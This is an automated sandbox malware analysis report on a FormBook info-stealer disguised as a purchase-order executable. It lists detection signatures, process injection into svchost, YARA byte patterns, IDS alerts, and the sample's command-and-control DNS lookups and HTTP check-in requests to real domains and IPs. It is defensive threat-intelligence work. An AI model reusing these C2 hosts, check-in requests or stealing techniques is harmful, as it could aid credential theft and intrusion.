Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order TE- 00011-7777.exe

Overview

General Information

Sample name:Purchase Order TE- 00011-7777.exe
Analysis ID:1510012
MD5:74e3ad61908355d646036b6b13a20916
SHA1:e6b0b4c0ce1cda9218c81d4453b8101745237149
SHA256:786448ef89e10b1b440d5c189417acb59a45d5e87e46aa6dc33c015132c46704
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase Order TE- 00011-7777.exe (PID: 4324 cmdline: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe" MD5: 74E3AD61908355D646036B6B13A20916)
    • svchost.exe (PID: 6188 cmdline: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • CjeBlighAyoJst.exe (PID: 1812 cmdline: "C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RMActivate_ssp.exe (PID: 4196 cmdline: "C:\Windows\SysWOW64\RMActivate_ssp.exe" MD5: 6599A09C160036131E4A933168DA245F)
          • CjeBlighAyoJst.exe (PID: 4444 cmdline: "C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5792 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x431b2:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x2b3b1:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e773:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16972:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f573:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17772:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", ParentImage: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe, ParentProcessId: 4324, ParentProcessName: Purchase Order TE- 00011-7777.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", ProcessId: 6188, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", ParentImage: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe, ParentProcessId: 4324, ParentProcessName: Purchase Order TE- 00011-7777.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe", ProcessId: 6188, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-12T13:02:39.719355+020020507451Malware Command and Control Activity Detected192.168.2.54971147.57.185.22780TCP
            2024-09-12T13:03:03.101506+020020507451Malware Command and Control Activity Detected192.168.2.54971689.58.49.180TCP
            2024-09-12T13:03:24.935270+020020507451Malware Command and Control Activity Detected192.168.2.549721154.23.184.24080TCP
            2024-09-12T13:03:38.544416+020020507451Malware Command and Control Activity Detected192.168.2.54972585.159.66.9380TCP
            2024-09-12T13:03:51.946841+020020507451Malware Command and Control Activity Detected192.168.2.549729185.173.111.7680TCP
            2024-09-12T13:04:05.250629+020020507451Malware Command and Control Activity Detected192.168.2.549733203.161.43.22880TCP
            2024-09-12T13:04:18.731382+020020507451Malware Command and Control Activity Detected192.168.2.549737161.97.168.24580TCP
            2024-09-12T13:04:32.719913+020020507451Malware Command and Control Activity Detected192.168.2.549741172.96.191.3980TCP
            2024-09-12T13:04:46.013073+020020507451Malware Command and Control Activity Detected192.168.2.549745104.21.20.12580TCP
            2024-09-12T13:05:00.602958+020020507451Malware Command and Control Activity Detected192.168.2.54974943.242.202.16980TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Purchase Order TE- 00011-7777.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: Purchase Order TE- 00011-7777.exeReversingLabs: Detection: 28%
            Source: Purchase Order TE- 00011-7777.exeVirustotal: Detection: 29%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Purchase Order TE- 00011-7777.exeJoe Sandbox ML: detected
            Source: Purchase Order TE- 00011-7777.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CjeBlighAyoJst.exe, 00000003.00000000.2157848345.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318026048.0000000000F3E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000002.00000003.2212437752.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212554587.0000000004101000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3887254418.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3892509880.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order TE- 00011-7777.exe, 00000000.00000003.2048768040.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138944191.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140864621.0000000003900000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2251311419.000000000094B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2248798529.000000000079A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Purchase Order TE- 00011-7777.exe, 00000000.00000003.2049007327.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, Purchase Order TE- 00011-7777.exe, 00000000.00000003.2048768040.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2138944191.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2243668615.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140864621.0000000003900000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000004.00000003.2251311419.000000000094B000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000003.2248798529.000000000079A000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888015793.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318173849.000000000273C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2593235540.000000001F5EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000000.2318173849.000000000273C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2593235540.000000001F5EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000002.00000003.2212437752.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2212554587.0000000004101000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3887254418.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, CjeBlighAyoJst.exe, 00000003.00000002.3892509880.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AADD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AADD92
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AE2044
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AE219F
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00AE24A9
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00AD6B3F
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00AD6E4A
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ADF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00ADF350
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ADFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00ADFDD2
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ADFD47 FindFirstFileW,FindClose,0_2_00ADFD47
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0013C380 FindFirstFileW,FindNextFileW,FindClose,4_2_0013C380
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4x nop then xor eax, eax4_2_00129B30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4x nop then mov ebx, 00000004h4_2_009404E7

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49721 -> 154.23.184.240:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49733 -> 203.161.43.228:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49729 -> 185.173.111.76:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49711 -> 47.57.185.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49737 -> 161.97.168.245:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49749 -> 43.242.202.169:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49725 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49716 -> 89.58.49.1:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49741 -> 172.96.191.39:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49745 -> 104.21.20.125:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.golbasi-nakliyat.xyz
            Source: DNS query: www.kckartal.xyz
            Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
            Source: Joe Sandbox ViewIP Address: 172.96.191.39 172.96.191.39
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00AE550C
            Source: global trafficHTTP traffic detected: GET /w9nd/?nR=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&OJ=btRp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.726075.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xcfw/?nR=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&OJ=btRp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.freepicture.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /p39s/?nR=1N9NMDNpm9Czos0sMOBPjc8XecgVvOOrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV8zKUy6S3cHQGYd//xgFiAZgSqx5KudB9OKNvEpiaWMoszOg==&OJ=btRp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.hm62t.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /k2vl/?nR=TxupyKnRMohPPcJXB3Z3XcqD+FlghHQdGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bLYIXV/UJ9VQc/byMU5VVxwAJLh5LFxVJTQrrPq42LBMvWA==&OJ=btRp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.golbasi-nakliyat.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /lwt6/?OJ=btRp&nR=j/d5AuZ+qvKLIrA78xGuwt+n8Fyj4Fobkvu2bg8Q1qFMmFYyV0FqC/r+9rC8R3lbyciTGueuIXyrXaZ/ebhZXWIw83yuKrEb5GYAT/WLDDlAfH79a/0YJ9h9gjbLSxDOvQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.mfgamecompany.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ftr3/?nR=7ghTfXuNFdv7bt0fQ6dp+VYKrg9F0VottJoldp68xQSgk3fAwjETInI5bmz0SHizsmBfpbcRVbCgLhFU68m+g+0qN5CZ17IzjLi3DtoRUNuK8DdWmd+CTazIxVVgqHT8dA==&OJ=btRp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.quilo.lifeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /wjff/?nR=4KVKOjLTUXvpTd2u/bZ1Xtjp48VIQpKAiZnao6g9chZjOHWeMu7z3zqylslmOgP9LXsxnQP9kQW6V1nPysVCefcRDYtQJbJyj2mk5xrQKh9CjNT1kJiwas5jw5tGEdzT0Q==&OJ=btRp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.qiluqiyuan.buzzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3lkx/?nR=RihUS+ZcBcWtP49fbKLPl8hUiWX9OeM0xYk2jkkE+x6ehgmefEg3XF27GOoD6ZAnAm79O7OuHoRKwHtCqV4uYWL7+sOZXKma82UzwNxpRmep+gGd7K5Ptmsj9EAWiB5wAw==&OJ=btRp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.bola88site.oneConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /h5qr/?nR=/bmdZ0vLXnogocV3t4J0vpXKy2/OoNnhB87loKV3gq9LyeQpMfhyu6mMTgPwDPC8F+hhJIsm9BUDnxBtc5ev2o5O2JmBXO2rvj/sbpH3UdghJzgGJYmb4kNKd7aCf9ce4Q==&OJ=btRp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kckartal.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ed2j/?nR=HnYP2yoU4dt40olsHjvCR7kBP/y2BgIkbcmGMLslyKV8dFp2SGuaYgvLul2clibdaJeHhADQmhDO4iexoifjcdOeiKY5v07N606wVFpuauJi0/RjjYjigABfPEh6YVaweA==&OJ=btRp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.mizuquan.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.726075.buzz
            Source: global trafficDNS traffic detected: DNS query: www.freepicture.online
            Source: global trafficDNS traffic detected: DNS query: www.318st.com
            Source: global trafficDNS traffic detected: DNS query: www.hm62t.top
            Source: global trafficDNS traffic detected: DNS query: www.golbasi-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mfgamecompany.shop
            Source: global trafficDNS traffic detected: DNS query: www.quilo.life
            Source: global trafficDNS traffic detected: DNS query: www.qiluqiyuan.buzz
            Source: global trafficDNS traffic detected: DNS query: www.bola88site.one
            Source: global trafficDNS traffic detected: DNS query: www.kckartal.xyz
